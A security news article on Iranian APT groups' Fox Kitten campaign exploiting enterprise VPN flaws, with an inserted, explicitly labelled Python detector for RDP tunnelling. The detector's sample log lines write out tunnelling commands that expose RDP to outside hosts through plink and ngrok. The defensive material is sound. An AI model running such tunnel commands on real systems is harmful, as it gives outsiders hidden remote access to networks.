Iranian Hackers Exploited Enterprise VPN Flaws in Major Campaign

Infamous Iranian hacking groups APT33 and APT34 appear to have been working together for the past three years to compromise dozens of organizations worldwide, and their attacks involved some of the enterprise VPN vulnerabilities disclosed last year, ClearSky reports.

Believed to be backed by the Iranian government, APT33 (also called Refined Kitten, Elfin, Magnallium and Holmium) and APT34 (also referred to as OilRig and Greenbug) are known for their cyber-espionage activities targeting various entities in the Middle East, the United States, Europe, and Asia.

Since 2017, the two groups likely collaborated as part of an offensive campaign targeted at numerous companies and organizations from the IT, telecommunications, oil and gas, aviation, government, and security sectors around the world, ClearSky says in a new report (PDF).

The activity, which Dragos recently referred to as Parisite and which ClearSky tracks as the Fox Kitten Campaign, also shows connections with APT39 (also tracked as Chafer), an Iran-based group mainly targeting the telecommunications and travel industries.

The campaign, ClearSky says, focused on gaining and maintaining access to the targeted organizations’ networks, stealing valuable information, establishing a long-lasting foothold at the targeted organizations, and breaching additional companies through supply-chain attacks.

Numerous open-source and self-developed offensive tools were used as part of the operation, along with known security flaws in enterprise VPN services from Pulse Secure, Fortinet and Palo Alto Networks.

These vulnerabilities include CVE-2019-11510 (pre-authentication arbitrary file read in Pulse Connect Secure), CVE-2018-13379 (pre-authentication path traversal in the FortiOS SSL VPN web portal that allows system files, including session files, to be downloaded), and CVE-2019-1579 (pre-authentication remote code execution in Palo Alto Networks GlobalProtect portals and gateways). All three are exploitable from the internet without credentials, which is what makes them attractive as an initial access vector. The NSA and the UK's National Cyber Security Centre (NCSC) warned last year that state-sponsored APTs had been exploiting these flaws.

Following the initial compromise, the attackers deploy tools to maintain access, including tunneling RDP sessions over SSH so that the traffic is both encrypted and hidden inside a protocol that is expected on the network, and to download and execute additional malware to establish their foothold in the network.

“The attackers have performed a routine process of identification, examination, and filtering of sensitive, valuable information from every targeted organization. The valuable information was sent back to the attackers for reconnaissance, espionage, or further infection of connected networks,” ClearSky reveals.

Self-developed tools employed in the Fox Kitten campaign include STSRCheck (a database and open-port mapping tool), POWSSHNET (a backdoor), a VBScript downloader (which fetches TXT files from the C&C server and concatenates them into a portable executable), a socket-based backdoor, and port.exe (which scans predefined ports and IPs).

Open-source tools the attackers adapted to their use include Invoke-TheHash (PowerShell commands for "Pass the Hash" techniques) and JuicyPotato (a local privilege escalation tool).

Moreover, the hackers employed seemingly legitimate tools in their attacks, including Ngrok, FRP and Serveo (free tunneling and reverse-proxy services that expose an internal host through an outbound connection), and PuTTY and Plink (SSH clients used for remote access and port forwarding).

ClearSky’s security researchers reveal that, throughout the observed attacks, the hackers did not employ a specific pattern to escalate privileges, steal credentials, move laterally, and ensure persistence.

The main purpose of the campaign, the researchers say, appears to have been information theft. In this regard, the hackers connected through RDP, identified relevant files, and exfiltrated them using POWSSHNET, a socket-based backdoor, and webshells. The hackers also employed three public tools for reverse proxy and SSH forwarding purposes, namely Ngrok, Serveo, and FRP.
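The RDP-over-SSH tunneling and the tunneling tools named above (Plink, Ngrok, FRP) leave a recognisable trace in process-creation telemetry, because all of them take the forwarded port on the command line or expose it through a known subcommand. The following is an added detection example written for this page; it is not code from ClearSky's report or from SecurityWeek. The log records are constructed, in an assumed tab-separated Sysmon-style layout (timestamp, host, PID, parent image, command line), and the heuristic is an editorial illustration, not a published rule. The command-line syntax it keys on is real: Plink and OpenSSH share the `-R`/`-L [bind_addr:]port:host:hostport` forwarding syntax and `-N` for "no shell", and `ngrok tcp <port>` publishes a local TCP port.

```python
"""Flag process-creation events that look like RDP being tunnelled over SSH
or published through a reverse-proxy service (added example, constructed data)."""
import re

RDP_PORT = 3389
SSH_CLIENTS = {"plink.exe", "ssh.exe", "ssh"}
NGROK = {"ngrok.exe", "ngrok"}
FRP_CLIENTS = {"frpc.exe", "frpc"}

# Plink/OpenSSH forwarding flags: -R or -L followed by [bind_addr:]port:host:hostport
FORWARD_RE = re.compile(r"(?:^|\s)-([RL])\s*(\S+)")
NO_SHELL_RE = re.compile(r"(?:^|\s)-N(?:\s|$)")

# Constructed Sysmon-style records (assumed layout): ts, host, pid, parent, command line.
SAMPLE_EVENTS = """\
2020-02-14T10:03:11Z\tWS01\t4412\texplorer.exe\tC:\\Windows\\Temp\\plink.exe -N -R 0.0.0.0:12345:127.0.0.1:3389 -pw Passw0rd! tunnel@203.0.113.5
2020-02-14T10:05:42Z\tSRV02\t1208\tcmd.exe\tssh.exe -N -f -L 13389:10.0.0.8:3389 ops@198.51.100.7
2020-02-14T10:06:01Z\tSRV02\t1300\tcmd.exe\tC:\\Users\\Public\\ngrok.exe tcp 3389
2020-02-14T10:07:18Z\tWS03\t2211\tpowershell.exe\tC:\\ProgramData\\frpc.exe -c frpc.ini
2020-02-14T10:09:55Z\tWS01\t3301\texplorer.exe\t"C:\\Program Files\\PuTTY\\putty.exe" -ssh admin@10.0.0.20
2020-02-14T10:10:30Z\tWS04\t3999\texplorer.exe\tmstsc.exe /v:10.0.0.8
"""


def image_name(cmdline):
    """Lower-case basename of the executable: first quoted token, else first word."""
    m = re.match(r'"([^"]+)"|(\S+)', cmdline)
    exe = m.group(1) or m.group(2)
    return exe.replace("\\", "/").rsplit("/", 1)[-1].lower()


def forwarded_ports(cmdline):
    """Yield (direction, target_port) for each -R/-L spec; the last field is hostport."""
    for flag, spec in FORWARD_RE.findall(cmdline):
        fields = spec.split(":")
        if len(fields) >= 3 and fields[-1].isdigit():
            yield ("reverse" if flag == "R" else "local", int(fields[-1]))


def classify(cmdline):
    """Return a reason string if the command line looks like RDP tunnelling, else None."""
    exe = image_name(cmdline)
    if exe in SSH_CLIENTS:
        for direction, port in forwarded_ports(cmdline):
            if port == RDP_PORT:
                reason = f"{exe}: {direction} forward of RDP port {port}"
                if NO_SHELL_RE.search(cmdline):
                    reason += " with no shell (-N), i.e. a tunnel-only session"
                return reason
        return None  # ordinary interactive SSH is not flagged
    if exe in NGROK:
        m = re.search(r"\btcp\s+(\d+)", cmdline)
        if m and int(m.group(1)) == RDP_PORT:
            return f"{exe}: exposing local RDP port {RDP_PORT} through a public tunnel"
        return f"{exe}: reverse-proxy tool launched"
    if exe in FRP_CLIENTS:
        return f"{exe}: FRP client launched (forwarded ports live in its config file)"
    return None


def scan(events):
    """Parse tab-separated records and return a list of findings (dicts)."""
    findings = []
    for line in events.splitlines():
        if not line.strip():
            continue
        ts, host, pid, parent, cmdline = line.split("\t", 4)
        reason = classify(cmdline)
        if reason:
            findings.append({"time": ts, "host": host, "pid": int(pid),
                             "parent": parent, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['time']} {f['host']} pid={f['pid']} parent={f['parent']}: {f['reason']}")
```

On the constructed sample this flags four of the six events (the Plink reverse tunnel, the OpenSSH local forward, ngrok publishing 3389, and the FRP client launch) and ignores an interactive PuTTY session and a normal mstsc.exe connection. In production the same logic belongs in the SIEM as a rule over Sysmon Event ID 1 or Windows Event 4688, and the FRP case should be followed up by pulling the referenced config file, since the forwarded port is not visible on the command line.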

“The Fox Kitten campaign is a continuous campaign operated, with high probability, by state-sponsored Iranian APT groups whose purpose is espionage against numerous companies mainly in the sectors of IT, defense, electricity, oil and gas and aviation companies,” ClearSky notes.

The researchers observed two main attack waves that compromised companies in Israel, USA, Saudi Arabia, Lebanon, Kuwait, UAE, Australia, France, Poland, Germany, Finland, Hungary, Italy and Austria.

Previously, security researchers revealed connections between various Iran-linked hacking groups, based on the reuse of infrastructure and malicious code, but it appears that the collaborative efforts between at least some of them might run deeper.

“We attribute the ‘Fox Kitten’ campaign, with medium-high confidence, to the APT34 group, and with medium confidence to the APT33 and APT39 groups, and we assess that there is a cooperation between the groups in infrastructure and possibly beyond that,” ClearSky’s researchers say.

Related: More Threat Groups Target Electric Utilities in North America

Related: Iranian Hackers Target U.S. Research Organization in Ongoing Campaign

Written By

Ionut Arghire is an international correspondent for SecurityWeek.